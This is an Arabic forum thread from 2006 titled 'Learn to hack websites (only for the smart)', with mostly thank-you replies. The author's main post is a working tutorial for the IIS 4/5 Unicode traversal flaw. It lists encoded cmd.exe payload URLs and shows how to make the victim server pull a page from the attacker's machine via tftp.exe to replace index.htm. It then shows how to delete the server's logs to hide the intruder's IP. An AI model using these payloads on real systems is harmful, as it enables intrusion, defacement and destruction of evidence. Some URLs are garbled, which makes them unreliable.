Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/showthread.php on line 639

Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/showthread.php on line 1041

Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/showthread.php on line 1046

Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/showthread.php on line 1518

Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/showthread.php on line 1523
تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ - منتديات شباب فلسطين
نحن مع غزة


الإهداءات

العودة   منتديات شباب فلسطين > محطات تقنية > مُتعلقات التقنية

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 02-12-2006, 04:25 PM   #1
احمد سعد!
I ♥ ISLAM
 
الصورة الرمزية احمد سعد!

قوة السمعة: 17 احمد سعد! will become famous soon enough

Thumbs up تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟







إذا أعجبك موضوع من مواضيعي فلا تقل شكـراً ... بل قل الآتـي ::
اللهم اغفر له ولوالديه ماتقدم من ذنبهم وما تأخر..وقِهم عذاب القبر وعذاب النار..
و أدخلهم الفردوس الأعلى مع الأنبياء والشهداء والصالحين ..واجعل دعاءهم مستجاب في الدنيا والآخرة ..اللـهم آميـن....
  اقتباس المشاركة
قديم 02-12-2006, 04:49 PM   #2
ابراهيم نصر
I ♥ ISLAM
 
الصورة الرمزية ابراهيم نصر

قوة السمعة: 24 ابراهيم نصر will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

مشكووووووووووووووووررر اخى احمد ويعتيك العافية


عاشق (تامر حسنى))
  اقتباس المشاركة
قديم 02-12-2006, 09:50 PM   #3
احمد سعد!
I ♥ ISLAM
 
الصورة الرمزية احمد سعد!

قوة السمعة: 17 احمد سعد! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

IIS بداية نعرف ماهي

هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي IISالـ

IIS5.0...وويندوز الفين يمتلك الاصدارة الخامسة من ملقم معلومات الانترنت

بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس 4 او 5 وهذه النقطة تستغل بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامةً يفكرون الان في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن لا هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الاضعاف الموجودة في الان تي
لكن بتلك الطريقة قد يكونون جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي



http://www.xxxxxx.com/scripts/..&Aa....exe?/c+dir+c


ركزو هنا الان بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي c:هذه الثغرة تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c
scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c
scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c
scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c
scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c
scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c
scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال



http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c


أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32 ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في تنفيذها
مثال:


http://www.xxxxxx.com/scripts/..&Aa....exe?/c+dir+c


هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لاحظ التغير

http://www.xxxxxx.com/scripts/..&Aa.../Winnt/Sytem32



ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز WinntSytem32
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون ..... الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط للتطابقها يجب عليك الدخول باي كان على مللف السستم
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة


http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c



ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا الامتداد
c+dir+c:هنا تضيف أسماء الملفات


http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32



كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لان هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن الله تعبك ماهو رايح على الفاضي
................................... ............... ................................... ....
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان

http://www.geocities.com/anorR1234/tftpd32.zip



C:وبعد ماتنزل البرنامج وتفك الضغط منه من الافضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الأساسية
C:أسمع كلامي وحط كل شي في
لأنك لو حطيتها بإذن الله راح تنجح المهمه
-----------------------------------------------------------------
الان بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل الابلود
أي
أبلود = تحميل
مو تجميل
وتحميل الملفات طريقة معقدة نسبياً بس أنا متفائل بالخير لأني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضاً الى المتصفح
وتضاف بهذه الطريقة
مثال

http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c


تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الإضافات من الثغرة لكي تضيف امر النسخ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:inetpubw wwrootindex.ht m
يعني الى راح نمسحه من الثغرة بيكون هذه الاضافة
/c+dir+c:
عشان تظيف بدالها
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:inetpubw wwrootindex.ht m
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:inetpubw wwrootindex.ht m
شايفين ياشباب إش الى اتغير
بس لازم أيضاً إنك تغير اللازم في أمر النسخ
مثل
tftp.exe هذا سيبه في حاله لانه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الان
"-i" هذا برضه سيبه لانه مهم
1.1.1.1 هنا بدال الارقام هذا تكتب الايبي تبع جهازك وعشان تتأكد من الايبي لمن تشغب التي اف تي بي راح يطلع ايبي وهذا الايبي الى طلعلك هو الى تكتبه
GET هذه الاضافة سيبها في حالها لانها تعتبر شرط في نسخ المفات
index.htm هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
C:inetpubwwwroot وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htm هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
C:يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htm ومثلا اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الان صارت مشابها لمثل هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-i"+212.212.212.212+GET+index.htm+C: inetpubwwwroot index.htm
ولو طلعت مشابها لها اضغط إنتر وتوكل على الله
وبإذن الله راح يتنسخ الملف
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
وفى النقطة الاخيرة والاهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل الايبي



http://server/msadc/..À¯../..../c+del+c:*.log


وهذه لنكات لكي تسد الثغرة داخل موقعك اذا كانت شغالة
Patches to repair this Bug:

IIS 4.0 on WinNT 4http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp IIS 5.0 on Win2000



http://www.microsoft.com/windows200...862/default.asp


مع تحياتى
احمد سعد!






إذا أعجبك موضوع من مواضيعي فلا تقل شكـراً ... بل قل الآتـي ::
اللهم اغفر له ولوالديه ماتقدم من ذنبهم وما تأخر..وقِهم عذاب القبر وعذاب النار..
و أدخلهم الفردوس الأعلى مع الأنبياء والشهداء والصالحين ..واجعل دعاءهم مستجاب في الدنيا والآخرة ..اللـهم آميـن....
  اقتباس المشاركة
قديم 02-13-2006, 09:11 PM   #4
الفرعون العاشق!
I ♥ AQSA

قوة السمعة: 11 الفرعون العاشق! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

مشكووور اخى


نأسف :: تم حذف التوقيع لتجاوز المساحة المطلوبة ووجود ملف صوتي يعمل تلقائيا
  اقتباس المشاركة
قديم 02-13-2006, 11:09 PM   #5
احمد سعد!
I ♥ ISLAM
 
الصورة الرمزية احمد سعد!

قوة السمعة: 17 احمد سعد! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

لا شكر اخى الفرعون






إذا أعجبك موضوع من مواضيعي فلا تقل شكـراً ... بل قل الآتـي ::
اللهم اغفر له ولوالديه ماتقدم من ذنبهم وما تأخر..وقِهم عذاب القبر وعذاب النار..
و أدخلهم الفردوس الأعلى مع الأنبياء والشهداء والصالحين ..واجعل دعاءهم مستجاب في الدنيا والآخرة ..اللـهم آميـن....
  اقتباس المشاركة
قديم 02-14-2006, 11:31 AM   #6
الفرعون العاشق!
I ♥ AQSA

قوة السمعة: 11 الفرعون العاشق! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

مشكووووووور اخى احمد


نأسف :: تم حذف التوقيع لتجاوز المساحة المطلوبة ووجود ملف صوتي يعمل تلقائيا
  اقتباس المشاركة
قديم 02-17-2006, 04:37 PM   #7
النجم مصطفى
I ♥ AQSA
 
الصورة الرمزية النجم مصطفى

قوة السمعة: 0 النجم مصطفى will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

تسلم يا غالى
  اقتباس المشاركة
قديم 02-18-2006, 01:08 AM   #8
احمد سعد!
I ♥ ISLAM
 
الصورة الرمزية احمد سعد!

قوة السمعة: 17 احمد سعد! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

مشكور يا حبيبى على الرد






إذا أعجبك موضوع من مواضيعي فلا تقل شكـراً ... بل قل الآتـي ::
اللهم اغفر له ولوالديه ماتقدم من ذنبهم وما تأخر..وقِهم عذاب القبر وعذاب النار..
و أدخلهم الفردوس الأعلى مع الأنبياء والشهداء والصالحين ..واجعل دعاءهم مستجاب في الدنيا والآخرة ..اللـهم آميـن....
  اقتباس المشاركة
قديم 02-26-2006, 10:20 PM   #9
صمت السنين
I ♥ PALESTINE
 
الصورة الرمزية صمت السنين

قوة السمعة: 32 صمت السنين will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

تسلم اخى
  اقتباس المشاركة
قديم 02-26-2006, 11:41 PM   #10
احمد سعد!
I ♥ ISLAM
 
الصورة الرمزية احمد سعد!

قوة السمعة: 17 احمد سعد! will become famous soon enough

افتراضي مشاركة: تعلم اختراق المواقع (فقط للاذكياء)؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

لا شكر اخى وهم






إذا أعجبك موضوع من مواضيعي فلا تقل شكـراً ... بل قل الآتـي ::
اللهم اغفر له ولوالديه ماتقدم من ذنبهم وما تأخر..وقِهم عذاب القبر وعذاب النار..
و أدخلهم الفردوس الأعلى مع الأنبياء والشهداء والصالحين ..واجعل دعاءهم مستجاب في الدنيا والآخرة ..اللـهم آميـن....
  اقتباس المشاركة
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
معلومات إسلامية محمود إيماني نبض حياتي 7 08-26-2007 08:15 PM
هل تعلم ~ معلومات رياضية ... محمود عَـلى الـرَف ْ ~ 14 04-28-2006 03:50 AM
هل تعلم ramram الــوآحــة الـعــآمّــة 2 01-21-2006 01:43 PM
معلومات إسلامية ....... اسلام إيماني نبض حياتي 4 11-13-2005 02:32 PM
- - --^[ ( ألهكر واساليب الاختراق مـــــــــــــــهم للمبتدئ الزعيم مُتعلقات التقنية 6 07-06-2005 05:47 PM


الساعة الآن 07:48 AM.